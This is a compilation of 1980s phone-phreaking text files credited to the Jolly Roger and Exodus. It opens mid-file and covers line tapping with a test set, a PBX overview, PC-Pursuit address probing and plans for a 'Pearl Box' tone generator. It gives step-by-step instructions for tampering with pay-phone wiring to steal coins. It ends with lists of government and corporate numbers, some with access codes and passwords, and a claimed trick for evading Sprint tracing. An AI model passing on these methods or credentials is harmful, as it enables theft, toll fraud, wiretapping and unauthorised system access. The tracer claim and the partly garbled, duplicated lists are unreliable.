2  above  (for unattended recording of >all< line  activity),  or  
just  any test set if you are going to be there to  monitor  when  
they are dialing, talking, etc.  
Place  a  telephone pickup coil (I recommend the Becoton  T-5  TP  
coil  or equivalent) onto the test set,  and put the TP plug into  
the mic.  jack of any standard tape recorder.  Hit play, rec, and  
pause.   Alternate  pause when you want to record (I  dont  think  
anyone should have any difficulty with this at all...) 
Well,  if  you  still can't make a test set or you dont have  the  
parts, there's still hope.  Alternate methods:          
1>  Find  a  bell test set in a manhole or a  bridging  head  and  
'Borrow it indefinately... 
2>  Test sets can  be  purchased from: 
    Techni-Tool 
    5 Apollo Road 
    Box 368 
    Plymouth Meeting PA., 19462 
Ask for catalog #28 
They  are usually $300 - $600, and are supposed to have  MF  
dialing  capability as well as TT dialing.  They are also of much  
higher quality than the standard bell test sets. 
If you would like to learn more about the subjects covered here,  
I suggest: 
1>  Follow Bell trucks and linemen or technicians and ask  subtle  
    questions. also try 611 (repair service) and ask questions.. 
2> Explore your area for any Bell hardware,  and experiment  with  
   it.  Don't try something if you are not sure what youre doing,  
   because you wouldnt want to cause problems, would you? 

                               -----Exodus-----


Getting Money out of Pay Phones                by the Jolly Roger

I will now share with you my experiences with pay telephones.  You will discover
that it is possible to get money from a pay phone with a minimum of effort.
Theory: Most pay phones use four wires for the transmission of data and 
codes to the central office.  Two of them are used for voice (usually red and
green), one is a ground, and the last is used with the others for the
transmission of codes.
It is with this last wire that you will be working with.  On the pay phone that
I usually did this to, it was colored purple, but most likely will be another
color.
What you will do is simply find a pay phone which has exposed wires, such that
one of them can be disconnected and connected at ease without
fear of discovery. You will discover that it is usually a good idea to
have some electrical tape along with you and some tool for cutting this
tape. 
Through trial and error, you will disconnect one wire at a time starting with
the wires different than green and red.  You do want a dial tone during
this operation.
What you want to disconnect is the wire supplying the codes to the telephone
company so that the pay phone will not get the 'busy' or 'hang-up' command.
Leave this wire disconnected when you discover it.
What will happen:  Anytime that someone puts any amount of money into the pay
phone, the deposit will not register with the phone company and it
will be held in the 'temporary' chamber of the pay phone.
Then, (a day later or so) you just code back to the phone, reconnect the wire,
and click the hook a few times and the phone will dump it all out the shute.
(What is happening is that the 'hangup' code that the phone was not
receiving due to the wire being disconnected suddenly gets the code and
dumps its' 'temporary' storage spot.)
You can make a nice amount of money this way, but remember
that a repairman will stop by every few times it is reported broken and
repair it, so check it at least once a day.
Enjoy and have fun.. Many phones I have done this to, and it works
well with each..  
                                         -= Exodus =-


Computer Based PBX                     Courtesy of the Jolly Roger
    (Originally an Apple ][ file for forgive the upper case!)

TO GET A BETTER UNDERSTANDING OF WHAT A PBX CAN DO, HERE ARE A FEW BASIC
FUNDAMENTALS.THE MODERN PBX IS A COMBINED COMPUTER,MASS STORAGE DEVICE,
AND OF COURSE A SWITCHING SYSTEM THAT CAN:
      [1] PRODUCE ITEMIZED,AUTOMATED BILLING PROCEDURES,TO ALLOW THE
          IDENTIFICATION AND MANAGEMENT OF TOLL CALLS. [HAHAHA]
      [2] COMBINE DAYTIME VOICE GRADE COMMUNICATION CIRCUITS INTO
          WIDEBAND DATA CHANNELS FOR NIGHT TIME HIGH SPEED DATA
          TRANSFERS.
      [3] HANDLES ELECTRONIC MAIL [ INCLUDING OFFICE MEMOS ].
      [4] COMBINE VOICE CHANNELS INTO A WIDEBAND AUDIO/VISUAL
          CONFERENCE CIRCUIT,WITH THE ABILITY TO XFER AND
          CAPTURE SLIDES,FLIPCHARTS,PICTURES OF ANY KIND.
BOTH THE EXTERNAL AND INTERNAL CALLING CAPACITY OF THE PBX SYSTEM MUST BE
CAREFULLY CONSIDERED BECAUSE MANY BUSINESS OPERATIONS RUN A VERY HIGH RATIO
OF INTERNAL STATION TO STATION DIALING AND A LOW CAPACITY SYSTEM WILL NOT
HANDLE THE REQUESTED TRAFFIC LOAD.
A CRITICAL FACTOR IS THE NUMBER OF TRUNKS AND THE CENTRAL OFFICE FACILITIES
THAT ARE USED FOR OUTSIDE CONNECTIONS.ANOTHER IS THE NUMBER OF JUNCTIONS OR
[LINKS] THAT MAKE UP THE INTERNAL CALLING PATHS.
TO UNDERSTAND THE SERVICES AVAILABLE ON A TYPICAL COMPUTER RUN PBX IT IS
NECESSARY TO INTRODUCE THE SUBJECT OF TIME DIVISION SWITCHING.IN A TIME
DIVISION SWITCHING NETWORK ALL CONNECTIONS ARE MADE VIA A SINGLE COMMON BUS
CALLED (OF COURSE) A 'TIME-DIVISION BUS'.EVERY LINE TRUNK THAT REQUIRES A
CONNECTION WITH ANOTHER IS PROVIDED WITH A PORT CIRCUIT.ALL PORT CIRCUITS
HAVE ACCESS TO THE TIME DIVISION BUS THROUGH A TIME DIVISION SWITCH.
[WHEN TWO PORTS REQUKRE CONNECTION,THEIR TIME DIVISION SWITCHES OPERATE AT
A VERY HIGH FREQUENCY (16,000 TIMES PER SECOND).THIS TECHNIQUE,WHICH IS
CALLED 'SPEECH SAMPLING',ALLOWS MANY SIMULTANEOUS CONNECTIONS OVER THE SAME
TIME DIVKSION BUS.EACH CONNECTION IS ASSIGNED A TIME INTERVAL,THE 'TIME SLOT'
,AND THE NUMBER OF TIME SLOTS IDENTIFIES THE NUMBER OF SIMULTANEOUS CONNECT-
IONS AMONG PORTS.]
THE NEXT CRITICAL ITEM IS CIRCUIT PACKS.THE SYSTEM ELEMENTS THAT WE WILL BE
DESCRIBING IN FUTURE TUTORIALS [LINES/TRUNKS/SWITCHES,MEMORY AND CONTROL] ARE
CONTAINED ON PLUG IN CIRCUIT PACKS.EACH LINE CIRCUIT PACK CONTAINS A NUMBER
OF LINES,IN EXAMPLE,FOUR.BUT THE ASSIGNMENT OF STATION NUMBERS TO ACTUAL
PHONE LINE CIRCUITS IS FLEXIBLE.
THE SYSTEM MEMORY IS CONTAINED IN CIRCUIT PACKS WHICH PROVIDE THE CALL
PROCESSING FUNCTIONS.THE CIRCUIT PACKS ARE HELD IN SMALL FRAMES CALLED
'CARRIERS'.WITHIN EACH CARRIER,THE CIRCUIT PACKS ARE PLUGGED INTO POSITIONS:
THE 'SLOTS'.EVERY CIRCUIT CAN BE ADDRESSED BY,SAY A FIVE DIGIT NUMBER WHICH
TELLS ITS LOCATION BY CARRIER-SLOT-CIRCUIT.... [STARTING TO GET THE IDEA?]
THERE CAN BE THREE TYPES OF CARRIERS IN A MODERN PBX SYSTEM:
                O LINE CARRIERS
                O TRUNK CARRIERS
                O CONTROL CARRIERS
THE LINE CARRIERS CONTAIN STATION LINES.IN A.T.& T.'S "DIMENSION" MODEL,FOR
EXAMPLE,A TOTAL OF 52 TO 64 LINES ARE PROVIDED.THE TRUNK CARRIERS CONTAIN
SLOTS FOR 16 TRUNK CIRCUIT PACKS.THE CONTROL CARRIER INCLUDES PROCESSOR,
MEMORY,CONTROL CIRCUITRY,DATA CHANNELS FOR ATTENDANT CONSOLE CONTROL AND
TRAFFIC MEASUREMENT OUTPUTS.
PBX SYSTEMS WILL DIRECTLY REFLECT THE TYPES OF SERVICES OFFERED AT THE C.O.
           O CCSA
           O CCIS
           O PICTUREPHONES [SOONER THAN YOU THINK MY PHRIENDS]
COMMON CONTROL SWITCHING ARRANGEMENTS ( CCSA ) PERMIT ANY UNRESTRICTED TELE-
PHONE STATION TO CALL ANY OTHET INTERNAL OR EXTERNAL SYSTEM STATION BY USING
THE STANDARD SEVEN DIGIT NUMBER.ALTERNATE ROUTING IS A FEATURE OF CCSA SERVICE
THE INTERFACILITY,ALTERNATE ROUTED CALLING PATHS ARE ACCOMPLISHED AT THE TELE-
PHONE COMPANY CENTRAL OFFICE LEVEL,NOT AT THE PBX LEVEL.
A SYSTEM OF INTEREST TO LARGE SCALE TELEPHONE USERS IS COMMON CHANNEL INTER-
OFFICE SIGNALLING (CCIS).TYPICALLY,THIS TECHNIQUE EMPLOYS COMMON CHANNELS TO
CARRY ALL INTERFACILITY SIGNALLING INSTRUCTIONS: DIAL PULSES,ON HOOK (IDLE),
OFF HOOK (BUSY),AND SO ON,BETWEEN TWO SWITCHING CENTERS. [ GETTING WARM ].
CCIS REPLACES OLDER METHODS OF INTEROFFICE SIGNALLING SUCH AS 'IN BAND' AND
'OUT OF BAND' TECHNIQUES. BY THE WAY,REAL PHREAKS ARE SELLING THEIR BOXES TO
IDIOTS WHO STILL THINK THE'RE WORTH ALOT...THE FORMER (IN BAND) TRANSMITS
SIGNALLING DATA WITHIN THE NORMAL CONVERSATION BANDWIDTH.IT'S SHORTCOMING IS
THAT FALSE INFORMATION MAY BE TRANSMITTED DUE TO UNIQUE TONE OR NOISE
COMBINATIONS SET UP IN THE TALKING PATH. [THIS IS THE OFFICIAL REASONING].
OUT OF BAND SIGNALLING TECHNIQUES PLACED THE INTEROFFICE DATA IN SPECIAL
CHANNELS,GENERALLY ADJACENT TO AND IMMEDIATELY ABOVE THE VOICE PATH.TO PRE-
SERVE INTERCHANNEL INTEGRITY,OUT OF BAND SIGNALLING REQUIRES VERY EFFECIENT
FILTERING OR GREATER 'BAND GUARD' SEPERATION BETWEEN CHANNELS.

Brought to you in the Cookbook IV courtesy of Exodus!!!!!!!!!!!!




         Subject:    PC-Pursuit Port Statistic's 
         Date:       06/29/89 
         Written by: PC-Pursuit Users 
         ============================================================ 
         Introduction: 
         ============= 
              The last 30 days of PC-Pursuit have been extremely 
         controversial.  Users and ex-users have demanded accurate 
         statistics, and Telenet has provided us with very little. 
         And the data that was provided is questionable.  Well, here 
         is some data that is guaranteed to be accurate and make 
         Telenet scream. If you wish to update this data on your own, 
         we will tell you how later in this text. 
              The following chart consists of all the direct Telenet 
         addresses of the PC-Pursuit city nodes and the total number 
         of modems on each node.  Here is what the data means: 
         NJNEW/3 2011    .12    56 
         !     ! !        !      \-- Total Number of Modems in NJNEW 
         !     ! !        \- Last Working Suffix of Address sequence. 
         !     ! \- Direct Telenet Address Prefix. 
         !     \--- Baud Rate of This Port is 300. 
         \--------- Mnemonic. 
         Please note that there are several perfectly legal ways to 
         connect to a PC-Pursuit port such as NJNEW/3: 
              Ways To Connect to NJNEW/3: 
                   1)   C D/NJNEW/3,PCP10000,<password>   [HUNT] 
                   2)   C 2011,PCP10000,<password>        [HUNT] 
                   3)   C 2011.10,PCP10000,<password>     [NON HUNT] 
         The first, is self explanatory.  The second does the same 
         thing as the first, only that it is slightly faster and gives 
         the user much greater flexibility.  The third is an example 
         the flexibility, because a request is made to connect to the 
         tenth, and only the tenth, modem on the NJNEW/3 port. 
              By simply attempting to connect to every single modem 
         in the 2011 chain, we were able to count the number of modems 
         on each port and come up with the following charts which were
         extracted on June the twenty ninth of the year 1989: 
         Rotary   Direct  Max.  City     Rotary   Direct  Max.  City 
         Port     Address Range Total    Port     Address Range Total 
         -------- ------- ---   -----    -------- ------- ---   ----- 
         NJNEW/3  2011    .12   56       CAOAK/3  4155    . 4   16 
              /12 201301  .40                 /12 415216  . 8   
              /24 20122   . 4                 /24 41511   . 4   
         DCWAS/3  202115  . 6   46       CAPAL/3  415106  . 4   12 
              /12 202116  .24                 /12 415224  . 8   
              /24 202117  .16                 /24 <NONE> <NONE> 
         CTHAR/3  <NONE> <NONE>  8       CASFA/3  415215  . 6   20 
              /12 203120  . 8                 /12 415217  .10   
              /24 <NONE> <NONE>               /24 41523   . 4   
         WASEA/3  20617   . 4   30       ORPOR/3  50320   . 2    8 
              /12 20619   .22                 /12 50321   . 6   
              /24 20621   . 4                 /24 <NONE> <NONE> 
         NYNYO/3  212315  . 4   22       AZPHO/3  60222   . 4   20 
              /12 212316  .14                 /12 60223   .12   
              /24 21228   . 4                 /24 60226   . 4   
         CALAN/3  213412  . 8   40       MNMIN/3  612120  . 4   22 
              /12 213413  .28                 /12 612121  .14   
              /24 21323   . 4                 /24 61222   . 4   
         TXDAL/3  214117  . 6   30       MABOS/3  617311  . 4   32 
              /12 214118  .22                 /12 617313  .20   
              /24 21422   . 4                 /24 61726   . 8   
         PAPHI/3  215112  . 6   36       TXHOU/3  713113  . 8   42 
              /12 2155    .22                 /12 713114  .24   
              /24 21522   . 8                 /24 71324   .10   
         OHCLE/3  21620   . 4   26       CACOL/3  71423   . 4   18 
              /12 21621   .18                 /12 7144    .10   
              /24 216120  . 4                 /24 71424   . 4   
         CODEN/3  303114  . 4   40       CASAN/3  714119  . 4   20 
              /12 303115  .18                 /12 714213  .12   
              /24 30321   .22                 /24 714124  . 4   
         FLMIA/3  305120  . 6   28       CASDI/3  714102  . 4   22 
              /12 305121  .18            (619)/12 714210  .14   
              /24 305122  . 4                 /24 714121  . 4   
         ILCHI/3  312410  . 8   40       UTSLC/3  80120   . 4   22 
              /12 312411  .28                 /12 80121   .14   
              /24 31224   . 4                 /24 80112   . 4   
         MIDET/3  313214  . 6   30       FLTAM/3  81320   . 4   18 
              /12 313216  .18                 /12 81321   .10   
              /24 31324   . 6                 /24 813124  . 4   
         MOSLO/3  3145    . 4   16       MOKCI/3  816104  . 4   20 
              /12 314421  . 8                 /12 816221  .12   
              /24 31420   . 4                 /24 816113  . 4   
         GAATL/3  404113  . 8   32       CAGLE/3                ?? 
              /12 404114  .20                 /12 81821   .18   
              /24 40422   . 4                 /24   
         CASJO/3  408111  . 4   34       CASAC/3  9167    . 4   16 
              /12 40821   .26                 /12 91611   . 8   
              /24 408110  . 4                 /24 91612   . 4   
         WIMIL/3  41420   . 4   24       NCRTP/3  91920   . 4   20 
              /12 41421   .16                 /12 91921   .12   
              /24 414120  . 4                 /24 919124  . 4   
 
         01/29/89       PC-Pursuit Modems Statistics Chart 
                                 Number of Modems         City 
              Mnemonic        300      1200      2400     Total 
              ---------- -------- --------- --------- --------- 
              NJNEW            12        40         4        56 
              DCWAS             6        24        16        46 
              CTHAR             0         8         0         8 
              WASEA             4        22         4        30 
              NYNYO             4        14         4        22 
              CALAN             8        28         4        40 
              TXDAL             6        22         4        32 
              PAPHI             6        22         8        36 
              OHCLE             4        18         4        26 
              CODEN             4        18        22        44 
              FLMIA             6        18         4        28 
              ILCHI             8        28         4        40 
              MIDET             6        18         6        30 
              MOSLO             4         8         4        16 
              GAATL             8        20         4        32 
              CASJO             4        26         4        34 
              WIMIL             4        16         4        24 
              CAOAK             4         8         4        16 
              CAPAL             4         8         0        12 
              CASFA             6        10         4        20 
              ORPOR             2         6         0         8 
              AZPHO             4        12         4        20 
              MNMIN             4        14         4        22 
              MABOS             4        20         8        32 
              TXHOU             8        24        10        42 
              CACOL             4        10         4        18 
              CASAN             4        12         4        20 
              CASDI             4        14         4        22 
              UTSLC             4        14         4        22 
              FLTAM             4        10         4        18 
              MOKCI             4        12         4        20 
              CAGLE             4        18         4        26 
              CASAC             4         8         4        16 
              NCRTP             4        12         4        20 
                         -------- --------- --------- --------- 
              Total           166       562       170       898 
                         ======== ========= ========= ========= 
              Average   4.8823529 16.529412         5 26.411765 
              NOTE: CASAC/3, CASAC/24 were estimated. 
         I think the statistics basically speak for themselves. 
         I am sure there will no doubt be hundreds of people who will 
         not smile at the number of specific kinds of ports supported, 
         not to mention the number of 'dead' or 'down' modems you will 
         find when you verify the totals.  Usually, 2% to perhaps 10% 
         of the modems are 'dead' with specific ones repeatedly 
         failing week after week. 
         History Of This Collection: 
         =========================== 
              Almost a year ago a small selected group of devoted 
         individuals got together to discuss problems with the PC- 
         Pursuit Network, in the middle of our discussions a question 
         was asked as to how the network really processes our calls. 
         This was intended to help us assess SET? commands and other 
         such matters.  When the address hypothesis was offered we 
         quickly set out to prove it.  It was proved in about 3 
         minutes with the discovery of 2011 (First try was xxx1).  The 
         data has continually been collected and analyzed ever since, 
         but until now, has never been mass released. 
              A small group of teen age hackers discovered several 
         interesting things that can be done with these addresses-- 
         many of which will not be discussed here short of mentioning 
         that these ports connected to via these addresses are not 
         limited to PC-Pursuiters.  You can, however, fight "dead" 
         dialout modems in cities via the address method.  Dead modems 
         can be located in about 10 seconds (faster than Telenet), and 
         can either be reported or skipped past by the user connecting 
         to the next modem in the sequence after the "dead" one. 
         (Note: Say 2011.3 is dead, connect to 2011.4 and you will be 
         past it.  If 2011.4 is busy, go to 2011.5.  The reader should 
         notice 2011.3 is the same as 2011C.) 
              The most interesting value of these addresses is that 
         one can count the number of ports that Telenet keeps so 
         secret (Grin).  When there were only 28 cities in operation 
         there were an average of 2.7 300 baud, 9.4 1200 baud, and 2.5 
         2400 baud modems in each city.  Some cities had as little as 
         2 modems on a port and as many as 12.  Only recently has the 
         number of modems per city begun to jump. 
         How To Update The Count Yourself: 
         ================================= 
              An ID is not required to "request" one of these ports, 
         thus the tallying can be done any time of day by simply 
         typing the number at the @ prompt.  Here is an example with 
         four modems (NJNEW/24): 
         @20122.1 
         201 22A REFUSED COLLECT CONNECTION 19 80 
         @20122.2 
         201 22B REFUSED COLLECT CONNECTION 19 80 
         @20122.3 
         201 22C REFUSED COLLECT CONNECTION 19 80 
         @20122.4 
         201 22D REFUSED COLLECT CONNECTION 19 80 
         @20122.5 
         201 22E ILLEGAL ADDRESS 19 80 
         The reader should be aware that PC-Pursuit ports always 
         respond with '19 80'.  Do not confuse it with '19 00', which 
         are not PC-Pursuit ports.  In the above example we know there 
         are four ports because the forth was the last existing port 
         before we encountered the 'ILLEGAL ADDRESS.'  There are 
         several ways to signify that you have gone one beyond the end 
         of the ports: 
            1)  xxx xxx ILLEGAL ADDRESS 19 80 
            2)  xxx xxx NOT OPERATING 19 80 
            3)  The request freezes (Note: Issue a BREAK then D <C/R> 
                to abort the attempt yielding 'ATTEMPT ABORTED'.) 
         You should be aware that modems which are out of order in the
         middle of the sequence can respond with 'NOT OPERATING' or 
         may freeze the request.  You should also note that when 
         updating the existing list, all you need to do is try to 
         request the next modem beyond the end as of the last check. 
         Finding Newly Added Ports: 
         ========================== 
              Many ports have not yet been installed; hence, we do not 
         yet know the addresses.  New ports may be found by entering 
         the first three digits of the area code and appending (1-29, 
         101-129, 201-229, 301-329, etc.) until the 'REFUSED COLLECT 
         CONNECTION 19 80' appears.  Once this is found, simply log 
         onto the port address with your ID and R/V dial some silly 
         series of digits, disconnect the port, then connect to the 
         PC-Pursuit mnemonic you think it might be and R/V redial the 
         last number.  If the numbers match, you found it. 



Pearl Box Plans                                  by the Jolly Roger

The Pearl Box:Definition - This is a box that may substitute for many boxes
which produce tones in hertz. The Pearl Box when operated correctly can
produce tones from 1-9999hz. As you can see, 2600, 1633, 1336 and other
crucial tones are obviously in its sound spectrum.

Materials you will need in order to build The Pearl Box:
========================================================
C1, C2:.5mf or .5uf ceramic disk
       capacitors
Q1.....NPN transistor (2N2222 works
       best)
S1.....Normally open momentary SPST
       switch
S2.....SPST toggle switch
B1.....Standard 9-Volt battery
R1.....Single turn, 50k potentiometer
R2.....  "     "    100k potentiometer
R3.....  "     "    500k potentiometer
R4.....  "     "    1meg potentiometer
SPKR...Standard 8-ohm speaker
T1.....Mini transformer (8-ohm works
       best)
Misc...Wire, solder, soldering iron, PC
       board or perfboard, box to
       contain the completed unit,
       battery clip

Instructions for building Pearl Box:
======================================
Since the instruction are EXTREMELY difficult to explain in words, you will
be given a schematic instead. It will be quite difficult to follow but try
it any way. 

(Schematic for The Pearl Box)
+---+------------+---------+
    !            !          \
    C1            C2          \
    !             !            +
    +             +       -----+T1
    !\            +------------+-+
    !  b  c-------!              +
    !   Q1                   !   +-S1-
    !     e-----S2---+       !    SPKR
    !                !       !   +----
    !               B1       !
    !                !       !
    !                +-------+
    !R1   R2   R3   R4!
    /\/\ /\/\ /\/\ /\/\
      +--+ +--+ +--+
Now that you are probably thoroughly confused, let me explain a few
minor details. The potentiometer area is rigged so that the left pole is
connected to the center pole of the potentiometer next to it.
The middle terminal of T1 is connected to the piece of wire that runs down
to the end of the battery.

Correct operation of The Pearl Box:
===================================
You may want to get some dry-transfer decals at Radio Shack to make this
job a lot easier. Also, some knobs for the tops of the potentiometers
may be useful too. Use the decals to calibrate the knobs. R1 is the knob
for the ones place, R2 is for the tens place, R3 if for the hundreds
place and R4 is for the thousands place. S1 is for producing the all the
tones and S2 is for power. 
Step 1: Turn on the power and adjust the knobs for the desired tone.
       (Example: For 2600 hz-
         R1=0:R2=0:R3=6:R4=2)
Step 2: Hit the pushbutton switch and VIOLA! You have the tone. If 
you don't have a tone recheck all connections and schematic. 

                             Exodus


The Phreak file                            courtesy of the Jolly Roger

202 282 3010 UNIV. OF D.C.            
202 553 0229 PENTAGON T.A.C.          
202 635 5710 CATHOLIC UNIV. OF AMERICA
202 893 0330 DEFENSE DATA NETWORK     
202 893 0331 DEFENSE DATA NETWORK     
202 965 2900 WATERGATE                
203 771 4930 TELEPHONE PIONEERS       
206 641 2381 VOICE OF CHESTER         
212 526 1111 NEW YORK FEED LINE       
212 557 4455 SEX HOT LINE             
212 799 5017 ABC NY FEED LINE         
212 934 9090 DIAL-AN-IDIOT            
212 976 2727 P.D.A.                   
212 986 1660 STOCK QUOTES             
213 541 2462 STOCK MARKET REPORTS     
213 547 6801 NAVY SHIPS INFO          
213 576 6061 "     "                  
213 664 3321 NEWS FOR THE BLIND       
301 393 1000 "     "                  
301 667 4280 LOTTERY INFO             
312 939 1600 "  "                  
404 221 5519 NUCLEAR COMMISSION       
408 248 8818 1ST NAT'L BANK           
415 642 2160 EARTHQUAKE REPCRT        
505 883 6828 "     " 
512 472 2181 "     "                  
512 472 4263 WIERD RECORDING          
512 472 9833 "     "                  
512 472 9941 INSERT 25 CENTS          
512 472 9941 SPECIAL RECORDING        
512 870 2345 "     "                  
516 794 1707 "     "                  
619 748 0002 LOOP LINE     
619 748 0003 "     "                  
703 331 0057 MCI           (5 DIGITS) 
703 334 6831 WASH. POST               
703 354 8723 COMPEL INC.
703 737 2051 METROPHONE    (6 DIGITS) 
703 835 0500 VALNET        (5 DIGITS) 
703 861 7000 SPRINT      (6/8 DIGITS) 
703 861 9181 SPRINT      (6/8 DIGITS) 
714 974 4020 CA. MAINFRAME            
716 475 1072 N.Y. DEC-SYSTEM          
800 222 0555 RESEARCH INSTITUTE       
800 223 3312 CITIBANK
800 227 5576 EASTERN AIRLINES         
800 248 0151 WHITE HOUSE PRESS        
800 321 1424 FLIGHT PLANES            
800 323 3026 TEL-TEC       (6 GIGITS) 
800 323 4756 MOTOROLA DITELL          
800 323 7751 M.C.I. MAINFRAME         
800 325 4112 EAsYLINK                 
800 325 6397 F.Y.I.                   
800 344 4000 MSG SYSTEM               
800 368 6900 SKYLINE ORDER LINE       
800 424 9090 RONALD REAGAN'S PRESS    
800 424 9096 WHITE HOUSE SWITCH       
800 438 9428 ITT CITY CALL SWITCHING  
800 521 2255 AUTONET                  
800 521 8400 TRAVELNET     (8 DIGITS) 
800 526 3714 RCA MAINFRAME            
800 527 1800 TYMNET                   
800 621 3026 SPECIAL OPERATOR         
800 621 3028 "     "                  
800 621 3030 "     "                  
800 621 3035 "     "                  
800 631 1146 VOICE STAT               
800 821 2121 BELL TELEMARKETING      
800 828 6321 XEROX            $       
800 858 9313 RECORD-A-VOICE           
800 882 1061 AT&T STOCK PRICES        
914 997 1277 "     "                  
916 445 2864 JERRY BROWN              
N/A 950 1000 SPRINT                   
N/A 950 1022 MCI EXECUNET             
N/A 950 1033 US TELEPHONE             
N/A 950 1044 ALLNET        (6 DIGITS) 
N/A 950 1066 LEXITEL 
N/A 950 1088 SKYLINE       (6 DIGITS) 

-----------------------------------
PHONE #       | DESCRIPTION/CODE
-----------------------------------
201-643-2227  | CODES:235199,235022
              |       AND 121270
              |
800-325-4112  | WESTERN UNION
              |
800-547-1784  | CODES:101111,350009
              |       AND 350008
              |
800-424-9098  | TOLL FREE WHITE HS.
              |
800-424-9099  | DEFENSE HOT LINE
              |
202-965-2900  | WATERGATE
              |
800-368-5693  | HOWARD BAKER HOTLN
              |
202-456-7639  | REAGANS SECRETARY
              |
202-545-6706  | PENTAGON 
              |
202-694-0004  | PENTAGON MODEM
              |
201-932-3371  | RUTGERS
              |
800-325-2091  | PASSWORD: GAMES
              |
800-228-1111  | AMERICAN EXPRESS
              |
617-258-8313  | AFTER CONNECT 
              | PRESS CTRL-C
              |
800-323-7751  | PASSWORD:REGISTER
              |
800-322-1415  | CODES:266891,411266
              |       AND 836566
              | (USED BY SYSOP)
-----------------------------------
 The following 800 #'s have been
collected however no codes have 
been found yet! if you hack any
please let me know...
-----------------------------------
phone #         | codes: 
-----------------------------------
800-321-3344    | ???????????
800-323-3027    | ???????????
800-323-3208    | ???????????
800-323-3209    | ???????????
800-325-7222    | ???????????
800-327-9895    | ???????????
800-327-9136    | ???????????
800-343-1844    | ???????????
800-547-1784    | ???????????
800-547-6754    | ???????????
800-654-8494    | ???????????
800-682-4000    | ???????????
800-858-9000    | ???????????
800 #'s with carriers.
800-323-9007
800-323-9066
800-323-9073
800-321-4600
800-547-1784
1-800 numbers of the goverment.
800-321-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR1-1082:NAVY FINANCE CENTER.
800-424-5201:EXPORT IMPORT BANK.
800-523-0677:ALCOHOL TOBACCO AND.
800-532-1556:FED INFORMATION CNTR.
800-325-4072:COMBAT & ARMS SERVICE.
800-325-4095:COMBAT SUPPORT BRANCH.
800-325-4890:ROPD USAR COMBAT ARMS.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Directory of toll free numbers.
800-432-3960:SOCIAL SECURITY.
800-426-5996:PUGET NAVAL SHIPYARD.
Directory of toll free numbers.
301-234-0100:BALTIMORE ELECTRIC.
202-456-1414:WHITE HOUSE.
202-545-6706:PENTAGON.
202-343-1100:EPA.
714-891-1267:DIAL-A-GEEK.
714-897-5511:TIMELY.
213-571-6523:SATANIC MESSAGES.
213-664-7664:DIAL-A-SONG.
405-843-7396:SYNTHACER MUSIC.
213-765-1000:LIST OF MANY NUMBERS.
512-472-4263:WIERD.
512-472-9941:INSERT 25.
203-771-3930:PIONEERS.
213-254-4914:DIAL-A-ATHIEST.
212-586-0897:DIRTY.
213-840-3971:HOROWIERD
203-771-3930:PIONEERS
471-9420,345-9721,836-8962
836-3298,323-4139,836-5698
471-9440,471-9440,471-6952
476-6040,327-9772,471-9480
800-325-1693,800-325-4113
800-521-8400:VOICE ACTIVATED
213-992-8282:METROFONE ACCESS NUMBER
617-738-5051:PIRATE HARBOR
617-720-3600:TIMECOR #2
301-344-9156:N.A.S.A PASSWORD:GASET
318-233-6289:UNIVERSITY LOUISIANA
213-822-2112:213-822-3356
213-822-1924:213-822 3127
213-449-4040:TECH CENTER
213-937-3580:TELENET
1-800-842-8781
1-800-368-5676
1-800-345-3878
212-331-1433
213-892-7211
213-626-2400
713-237-1822
713-224-6098
713-225-1053
713-224-9417
818-992-8282
1-800-521-8400
After entering the sprint code,and, C+Destination number.Then enter this:
number:"205#977#22",And the main tracer for sprint will be disabled.
215-561-3199/SPRINT LONG DISTANCE
202-456-1414/WHITE HOUSE
011-441-930-4832/QUEEN ELIZABETH
916-445-2864/JERRY BROWN
800-424-9090/RONALD REAGAN'S PRESS
212-799-5017/ABC NEW YORK FEED LINE
800-882-1061/AT & T STOCK PRICES
212-986-1660/STOCK QUOTES
213-935-1111/WIERD EFFECTS!
512-472-4263/WIERD RECORDING
212-976-2727/P.D.A.
619-748-0002/FONE CO. TESTING LINES
900-410-6272/SPACE SHUTTLE COMM.
201-221-6397/AMERICAN TELEPHONE
215-466-6680/BELL OF PENNSYLVANIA
202-347-0999/CHESAPEAKE TELEPHONE
213-829-0111/GENERAL TELEPHONE
808-533-4426/HAWAIIAN TELEPHONE
312-368-8000/ILLINOIS BELL TELEPHONE
317-265-8611/INDIANA BELL
313-223-7233/MICHIGAN BELL
313-223-7223/NEVADA BELL
207-955-1111/NEW ENGLAND TELEPHONE
201-483-3800/NEW JERSEY BELL
212-395-2200/NEW YORK TELEPHONE
515-243-0890/NORTHWESTERN BELL
216-822-6980/OHIO BELL
206-345-2900/PACIFIC NORTHWEST BELL
213-621-4141/PACIFIC TELEPHONE
205-321-2222/SOUTH CENTRAL BELL
404-391-2490/SOUTHERN BELL
203-771-4920/SOUTHERN NEW ENGLAND
314-247-5511/SOUTHWESTERN BELL
414-678-3511/WISCONSIN TELEPHONE
800-327-6713/UNKNOWN ORIGIN
303-232-8555/HP3000
315-423-1313/DEC-10
313-577-0260/WAYNE STATE
512-474-5011/AUSTIN COMPUTERS
516-567-8013/LYRICS TIMESHARING
212-369-5114/RSTS/E
415-327-5220/NEC
713-795-1200/SHELL COMPUTERS
518-471-8111/CNA OF NY
800-327-6761/AUTONET
800-228-1111/VISA CREDIT CHECK
713-483-2700/NASUA
213-383-1115/COSMOS
408-280-1901/TRW
404-885-3460/SEARS CREDIT CHECK
414-289-9988/AARDVARK SOFTWARE
919-852-1482/ANDROMEDA INCORPORATED
213-985-2922/ARTSCI
714-627-9887/ASTAR INTERNATIONAL
415-964-8021/AUTOMATED SIMULATIONS
503-345-3043/AVANT GARDE CREATIONS
415-456-6424/BRODERBUND SOFTWARE
415-658-8141/BUDGE COMPANY
714-755-5392/CAVALIER COMPUTER
801-753-6990/COMPUTER DATA SYSTEMS
213-701-5161/DATASOFT INC.
213-366-7160/DATAMOST
716-442-8960/DYNACOMP
213-346-6783/EDU-WARE
800-631-0856/HAYDEN
919-983-1990/MED SYSTEMS SOFTWARE
312-433-7550/MICRO LAB
206-454-1315/MICROSOFT
301-659-7212/MUSE SOFTWARE
209-683-6858/ON-LINE SYSTEMS
203-661-8799/PROGRAM DESIGN (PDI)
213-344-6599/QUALITY SOFTWARE
303-925-9293/SENTIENT SOFTWARE
702-647-2673/SIERRA SOFTWARE
916-920-1939/SIRIUS SOFTWARE
215-393-2640/SIR-TECH
415-962-8911/SOFTWARE PUBLISHERS
415-964-1353/STRATEGIC SIMULATIONS
